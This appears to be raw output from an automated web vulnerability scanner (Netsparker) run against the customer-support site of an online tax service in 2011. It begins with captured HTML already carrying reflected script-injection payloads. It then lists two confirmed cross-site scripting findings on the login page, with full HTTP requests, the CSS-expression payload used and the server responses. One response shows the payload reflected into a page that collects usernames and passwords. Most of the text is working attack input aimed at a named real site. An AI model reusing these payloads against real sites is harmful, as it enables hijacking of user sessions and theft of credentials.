<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Support Help</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000770)%5C/script%5E&p_sid=js_k3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000770)%5C/script%5E&p_sid=js_k3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000770)%5C/script%5E&p_sid=js_k3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000770)%5C/script%5E&p_sid=js_k3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="seltabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="seltabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="seltabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x000770)</script>&p_sid=js_k3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="seltabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> <table cellpadding="0" cellspacing="4" border="0" width="100%"> <tr> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinl.gif" alt="" /></td> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="general_help_tab_bar_btn" align="center" nowrap><a class="selsubtab" href="help_general.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000770)%5C/script%5E&p_sid=js_k3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&amp;p_depth=1">General Help</a></td> </tr> <tr> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutl.gif" alt="" /></td> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="search_tips_tab_bar_btn" align="center" nowrap><a class="subtab" href="help_search.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000770)%5C/script%5E&p_sid=js_k3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&amp;p_depth=1">Search Tips</a></td> </tr> <tr> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><!-- Top border ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><!-- Help Text ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="hcell"><span class="smtext">As you search for answers to your questions, you can easily move from one function to another using the tabs on the tab bar. <b>Be aware that you must have a customer account to access certain functions.</b><br><br>Note: This site contains the Accessible Links function in compliance with Section 508 of the Rehabilitation Act. It can be activated using accessibility software, such as a screen reader, or through this keystroke sequence: From a page other than Support Home, press <b>Tab</b> until the focus is on the My Stuff tab. Press <b>Tab</b> again and then press <b>Enter</b>.</span></td><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td class="form" align="right" ><img height="12" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><!-- Answers ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="form"..
- /cgi-bin/olt.cfg/php/enduser/acct_login.php

/cgi-bin/olt.cfg/php/enduser/acct_login.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/s..

Parameters

Parameter Type Value
OLTSite GET " stYle=x:expre/**/ssion(alert(9)) ns="
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x
p_next_page GET std_alp.php

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%20&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_next_page=std_alp.php HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:58:10 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 23:18:10 GMT
RNT-Time: D=66164 t=1304117890021480
RNT-Machine: 01
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2469
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Support Login</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=OEIx3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=OEIx3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=OEIx3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=OEIx3Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><table cellpadding="2" cellspacing="2" border="0" width="100%"><!-- Returning Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="subtitle" colspan="2">Returning Users</td></tr><form class="minimal" name="_validate" method="post" action="acct_login_submit.php"><input type="hidden" name="OLTSite" value="&quot; stYle=x:expre/**/ssion(netsparker(9)) ns=&quot; " /><input type="hidden" name="p_sid" value="OEIx3Ksk" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="hidden" name="p_sp" value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x" /><input type="hidden" name="p_next_page" value="std_alp.php" /><input type="hidden" name="p_next_page" value="std_alp.php" /><tr><td class="label" align="right" nowrap><label for="p_userid">Username</label>:</td><td><input name="p_userid" id="p_userid" type="text" size="30" maxlength="80" /></td></tr><tr><td class="label" align="right" nowrap><label for="p_passwd">Password</label>:</td><td><input name="p_passwd" id="p_passwd" type="password" size="20" maxlength="20" /></td></tr><tr><td></td><td><input type="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Log In&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" class="btn" tabindex="0" name="login_btn" /></td></tr></form><!-- Forgotten User ID/Password ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you forgot your Username or Password...</td></tr><tr><td></td><td><form class="minimal" name="_assist" method="post" action="acct_assistance.php"><input type="hidden" name="p_sid" value="OEIx3Ksk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="submit" value="Go To Account Assistance" class="btn" tabindex="0" name="email_passwd_btn" /></td></tr></form><!-- New Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you do not have an account...</td></tr><tr><td></td><td><form class="minimal" name="_new" method="post" action="acct_new.php"><input type="hidden" name="p_sid" value="OEIx3Ksk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_next_page" value="std_alp.php" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="submit" value="Create a New Account" class="btn" tabindex="0" name="create_acct_btn" /></td></tr></form></table></td><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/bl.gif" alt="" /></td><td class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/br.gif" alt="" /></td></tr></table><br /><p><table border="0" cellpadding="0" cellspacing="0" width="790" background="https://www.olt.com/main/home/images/back-tiles.gif"> <tr> <td height=17> <div class="foot"> <a href="https://www.olt.com/main/home/default.asp">Home</a> | <a href="https://www.olt.com/main/home/about.asp">About Us</a> | <a href="https://www.olt.com/main/home/payment.asp">Payment Options</a> | <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> | <a href="https://www.olt.com/main/home/states.asp">States</a> | <a href="https://www.olt.com/main/home/getstarted.asp">Get Started</a> | ..
- /cgi-bin/olt.cfg/php/enduser/acct_login.php

/cgi-bin/olt.cfg/php/enduser/acct_login.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/s..

Parameters

Parameter Type Value
OLTSite GET " stYle=x:expre/**/ssion(alert(9)) ns="
p_accessibility GET 1
p_redirect GET 3

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%20&p_accessibility=1&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/accessibility.php?p_accessibility=1&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:04:49 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
